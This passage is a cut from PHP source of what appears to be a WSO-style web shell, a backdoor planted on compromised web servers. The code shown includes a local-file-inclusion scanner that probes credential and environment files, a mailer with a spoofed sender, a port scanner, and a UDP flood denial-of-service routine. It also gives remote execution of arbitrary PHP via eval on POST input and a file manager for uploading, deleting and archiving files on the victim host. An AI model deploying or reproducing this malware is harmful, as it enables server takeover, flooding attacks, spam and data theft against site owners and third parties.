"; } else { print "[!] Failed!".$target."".$lfimysql[$x]."
"; } $x++; } } } if ( $type == 6 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiftp[$x]) { $res3 = FetchURL($target.$lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiftp[$x]."
"; } else { print "[!] Failed!".$target."".$lfiftp[$x]."
"; } $x++; } } } if ( $type == 7 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
";{ $res3 = FetchURL($target.$lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiprocenv."
"; } else { print "[!] Failed!".$target."".$lfiprocenv."
"; } } } } } wsoFooter(); } function actionphptools() { wsoHeader(); ?>
Mailer




'; if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) { $headers = 'From:futredark261@gmail.com '.$_POST['from']; mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers); echo 'Email sent.'; } //port scanner echo '
Port Scanner
'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is open
'; } flush(); } }else{ ?>
Host:

Port start:

Port end:

"; $max_time = $time+$exec_time; $host = $_POST['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "
UDP Flood
Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '

Host: Length (seconds):
'; }else{ echo '
UDP Flood
Host:

Length (seconds):

'; } ?>
PHP info
'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '

Execution PHP-code

'; echo ' send using AJAX
'; 
    if(!empty($_POST['p1'])) { 
        ob_start(); 
        eval($_POST['p1']); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo '
'; wsoFooter(); } function actionFilesMan() { wsoHeader(); echo '

File manager

'; if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION['f'] as $f) @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); } elseif($_SESSION['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_SESSION['c']); foreach($_SESSION['f'] as $f) { if($f == '..') continue; if(@is_file($_SESSION['c'].$f)) $zip->addFile($_SESSION['c'].$f, $f); elseif(@is_dir($_SESSION['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_SESSION['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_SESSION['f'] as $f) { if($zip->open($_SESSION['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_SESSION['act'] == 'tar') { chdir($_SESSION['c']); $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f'])); chdir($GLOBALS['cwd']); } unset($_SESSION['f']); break; default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_POST['c']; } break; } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 "; if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar'))) echo "file name:  "; echo "
"; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length'